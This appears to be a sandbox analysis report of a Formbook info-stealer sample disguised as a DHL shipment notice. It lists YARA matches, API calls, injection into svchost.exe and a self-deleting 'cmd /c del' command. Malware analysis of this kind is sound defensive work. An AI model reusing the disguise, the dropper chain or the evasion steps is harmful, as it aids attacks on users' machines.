          Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403646
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0302B150 appears 87 times
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: String function: 00D72400 appears 54 times
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: String function: 00D74599 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041A320 NtCreateFile,2_2_0041A320
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041A3D0 NtReadFile,2_2_0041A3D0
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041A450 NtClose,2_2_0041A450
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041A500 NtAllocateVirtualMemory,2_2_0041A500
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041A31F NtCreateFile,2_2_0041A31F
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041A3CE NtReadFile,2_2_0041A3CE
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041A4FB NtAllocateVirtualMemory,2_2_0041A4FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069A50 NtCreateFile,LdrInitializeThunk,17_2_03069A50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069910 NtAdjustPrivilegesToken,LdrInitializeThunk,17_2_03069910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030699A0 NtCreateSection,LdrInitializeThunk,17_2_030699A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069840 NtDelayExecution,LdrInitializeThunk,17_2_03069840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069860 NtQuerySystemInformation,LdrInitializeThunk,17_2_03069860
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069710 NtQueryInformationToken,LdrInitializeThunk,17_2_03069710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069780 NtMapViewOfSection,LdrInitializeThunk,17_2_03069780
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069FE0 NtCreateMutant,LdrInitializeThunk,17_2_03069FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069650 NtQueryValueKey,LdrInitializeThunk,17_2_03069650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069660 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_03069660
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030696D0 NtCreateKey,LdrInitializeThunk,17_2_030696D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030696E0 NtFreeVirtualMemory,LdrInitializeThunk,17_2_030696E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069540 NtReadFile,LdrInitializeThunk,17_2_03069540
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030695D0 NtClose,LdrInitializeThunk,17_2_030695D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069B00 NtSetValueKey,17_2_03069B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0306A3B0 NtGetContextThread,17_2_0306A3B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069A00 NtProtectVirtualMemory,17_2_03069A00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069A10 NtQuerySection,17_2_03069A10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069A20 NtResumeThread,17_2_03069A20
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069A80 NtOpenDirectoryObject,17_2_03069A80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069950 NtQueueApcThread,17_2_03069950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030699D0 NtCreateProcessEx,17_2_030699D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069820 NtEnumerateKey,17_2_03069820
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0306B040 NtSuspendThread,17_2_0306B040
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030698A0 NtWriteVirtualMemory,17_2_030698A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030698F0 NtReadVirtualMemory,17_2_030698F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0306A710 NtOpenProcessToken,17_2_0306A710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069730 NtQueryVirtualMemory,17_2_03069730
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069760 NtOpenProcess,17_2_03069760
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0306A770 NtOpenThread,17_2_0306A770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069770 NtSetInformationFile,17_2_03069770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030697A0 NtUnmapViewOfSection,17_2_030697A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069610 NtEnumerateValueKey,17_2_03069610
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069670 NtQueryInformationProcess,17_2_03069670
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069520 NtWaitForSingleObject,17_2_03069520
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0306AD30 NtSetContextThread,17_2_0306AD30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03069560 NtWriteFile,17_2_03069560
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030695F0 NtQueryInformationFile,17_2_030695F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239A320 NtCreateFile,17_2_0239A320
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239A3D0 NtReadFile,17_2_0239A3D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239A450 NtClose,17_2_0239A450
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239A500 NtAllocateVirtualMemory,17_2_0239A500
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239A31F NtCreateFile,17_2_0239A31F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239A3CE NtReadFile,17_2_0239A3CE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239A4FB NtAllocateVirtualMemory,17_2_0239A4FB
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeVirustotal: Detection: 42%
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeReversingLabs: Detection: 48%
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeFile read: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeJump to behavior
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe "C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe"
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeProcess created: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeProcess created: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\aeokw.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeProcess created: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnokJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeProcess created: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnokJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\aeokw.exe"Jump to behavior
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403646
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeFile created: C:\Users\user\AppData\Local\Temp\nsk2670.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@9/4@3/3
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404ABB
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1524:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\mvbaz\xgpqcu\xwqn\f27888ddf02c4c6aa9eb1b8f5b3a0302\rlifld\nwoxnqyr\Release\nwoxnqyr.pdb source: DHL SHIPMENT NOTIFICATION 1146789443.exe, 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmp, aeokw.exe, 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, aeokw.exe, 00000001.00000000.249383523.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, aeokw.exe, 00000002.00000002.322132231.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, svchost.exe, 00000011.00000002.515611102.000000000352F000.00000004.10000000.00040000.00000000.sdmp, nsk2671.tmp.0.dr, aeokw.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: aeokw.exe, 00000001.00000003.255155254.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000001.00000003.254132987.000000001ADE0000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000002.00000003.260122291.00000000012DE000.00000004.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322328355.0000000001470000.00000040.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322514089.000000000158F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.322000917.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.323291458.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
